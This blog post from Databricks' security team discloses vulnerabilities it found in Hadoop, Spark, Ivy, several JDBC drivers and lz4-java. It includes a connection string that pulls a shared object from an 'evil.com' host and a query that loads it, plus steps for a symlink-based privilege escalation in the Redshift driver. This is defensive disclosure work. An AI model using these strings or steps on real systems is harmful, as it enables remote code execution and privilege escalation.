The Databricks Product Security team is deeply committed to ensuring the security and integrity of its products, which are built on top of and integrated with a variety of open source projects. Recognizing the importance of these open source foundations, the team actively contributes to the security of these projects, thereby enhancing the overall security posture of both Databricks products and the broader open source ecosystem. This commitment is manifested through several key activities, including identifying and reporting vulnerabilities, contributing patches, and participating in security reviews and audits of open source projects. By doing so, Databricks not only safeguards its own products but also supports the resilience and security of the open source projects it relies on.
This blog will provide an overview of the technical details of some of the vulnerabilities that the team discovered.
Apache Hadoop Common offers an API that allows users to untar an archive using the tar Unix tool. To do so, it builds a command line, potentially also using gzip, and executes it. The issue lies in the fact that the path to the archive, which could be under user control, is not properly escaped in some situations. This could allow a malicious user to inject their own commands in the archive name, via shell metacharacters for example.
The vulnerable code can be found here.
Note that makeSecureShellPath only escapes single quotes but doesn’t add any. There were some debates as to the consequences of the issue for Hadoop itself, but in the end since it is a publicly offered API, it ended up warranting a fix. Databricks was invested in fixing this issue as the Spark code for unpack was leveraging the vulnerable code.
Apache Spark™ uses some API to map a given user name to a set of groups it belongs to. One of the implementations is ShellBasedGroupsMappingProvider, which leveraged the id Unix command. The username passed to the function was appended to the command without being properly escaped, potentially allowing for arbitrary command injection.
The vulnerable code could be found here.
We had to figure out if this provider could be reached with untrusted user input, and found the following path:
Ironically, the Spark UI HTTP security filter could allow that code to reached via the doAs query parameter (see here). Fortunately, some checks in isUserInACL prevented this vulnerability to be triggerable in a default configuration.
Apache Ivy supports a packaging attribute that allows artifacts to be unpacked on the fly. The function used to perform the Zip unpacking didn’t check for “../” in the Zip entry names, allowing for a directory traversal type of attack, also known as “zip slip”.
The vulnerable code could be found here.
This could allow a user with the ability to feed Ivy a malicious module descriptor to write files outside of the local download cache.
SQLite JDBC driver can be made to load a remote extension due to the predictable temporary file naming when loading a remote database file using jdbc:sqlite::resource and enable_load_extension options that enable extension loading.
The main issue is using hashCode method to generate a temporary name without taking into account that hashCode will produce the same output for the same string across JVMs, an attacker can predict the output and, therefore, the location of the download file.
The vulnerable code can be found here.
While the issue can be triggered in one step, here is a breakdown for simplicity:
Using the following connection string: “jdbc:sqlite::resource:http://evil.com/evil.so?enable_load_extension=true”
This will result in downloading the .so file in a predictable location in the /tmp folder, and can be later loaded using: “select load_extension('/tmp/sqlite-jdbc-tmp-{NUMBER}.db')”
JDBC driver scrutiny has increased in the last few years, thanks to the work of people like pyn3rd, who presented their work at Security Conferences worldwide, notably “Make JDBC Attack Brilliant Again.” This issue is just a byproduct of their work, as it looks very similar to another issue they reported in the Snowflake JDBC driver.
The core of the issue resides in the openBrowserWindow function that can be found here.
This function will execute a command based on the redirect URI that could potentially be provided by an untrusted source.
To trigger the issue, one can specify a connection string such as: jdbc:hive2://URL/default;auth=browser;transportMode=http;httpPath=jdbc;ssl=true which uses the browser authentication mechanism, with an endpoint that will return a 302 and specify a Location header (as well as X-Hive-Client-Identifier) to provoke the faulty behavior. The fact that ssoURI is a Java URI restricts the freedom that an attacker would have with their crafted command line.
Spark's ThriftHttpServlet can be made to accept a cookie that will serve as a way to authenticate a user. It is controlled by the hive.server2.thrift.http.cookie.auth.enabled configuration option (the default value for this option depends on the project, but some of them have it set to true). The validateCookie function will be used to verify it, which will ultimately call CookieSigner.verifyAndExtract. The issue resides in the fact that on verification failure, an exception will be raised that will return both the received signature and the expected valid one, allowing a user to send the request again with said valid signature.
The vulnerable code can be found here.
Example output returned to the client:
Both Apache Hive and Apache Spark™ were vulnerable to this and were fixed with the following PRs:
The timeline for this issue to be fixed and published illustrates some of the difficulties encountered when dealing with reporting vulnerabilities to Open Source projects:
The Amazon JDBC Driver for Redshift is a Type 4 JDBC driver that enables database connectivity using the standard JDBC APIs provided in the Java Platform, Enterprise Edition. This driver allows any Java application, application server, or Java-enabled applet to access Redshift.
If the JDBC driver is extended across a privilege boundary, an attacker can use the Redshift JDBC Driver's logging functionality to append partially controlled log contents to any file on the filesystem. The contents can contain newlines / arbitrary characters and can be used to elevate privileges.
In the connection URL, a "LogPath" variable can be used to supply the path in which log files should be stored.
This results in files such as "redshift_jdbc_connection_XX.log," where XX is a sequential number within the directory, and log entries are written to the file as expected. When creating these files, symbolic links are honored, and the log contents are written to the target of the link.
By using a controlled directory and symlinking to critical files, a user in our environment can gain a controlled write to arbitrary root-owned files and elevate privileges on the system.
The source code for the Redshift JDBC logfile handling is available at the following repo: https://github.com/aws/amazon-redshift-jdbc-driver/blame/33e046e1ccef43517fe4deb96f38cc5ac2bc73d1/src/main/java/com/amazon/redshift/logger/LogFileHandler.java#L225
To recreate this, you can create a directory in tmp, such as “/tmp/logging.” Within this directory, the user must create symbolic links with filenames matching the pattern redshift_jdbc_connection_XX.log, where the log file increments each time the redshift JDBC connector is used.
These symbolic links must point to the file you wish to append to. The attacker can then trigger the use of the Redshift JDBC connector, following the symlink and appending it to the file.
The lz4-java library (a java wrapper around the lz4 library) contains a file-based race condition vulnerability that occurs when a compiled library is dropped onto a disk. Large Java applications such as Spark and Hadoop use this library heavily.
The following code demonstrates this vulnerability:
As you can see, this code writes out a .so stored within the jar file to a temporary directory before loading and executing it. The createTempFile function is used to generate a unique path to avoid collisions. Before writing the file to disk, the developer creates a variant version of the file with a .lck extension for the assumed purpose of stopping collisions from other processes using the library. However, this .lck file will allow an attacker watching the directory to attempt to race the creation of the file after receiving the filename from the .lck creation and creating a symbolic link pointing anywhere on the filesystem.
The ramifications of this are twofold: first, the attacker will be able to overwrite any file on the system with the contents of this .so file. This may allow an unprivileged attacker to overwrite root owned files. Second, the symlink can be replaced between writing and loading, allowing the attacker to load a custom shared object they provide as root. If this library is used across a privilege boundary, this may grant an attacker with code execution at an elevated privilege level.
At Databricks, we recognize that enhancing the security of the open source software we utilize is a collective effort. We are committed to proactively improving the security of our contributions and dependencies, fostering collaboration within the community, and implementing best practices to safeguard our systems. By prioritizing security and encouraging transparency, we aim to create a more resilient open source environment for everyone. Learn more about Databricks Security on our Security and Trust Center.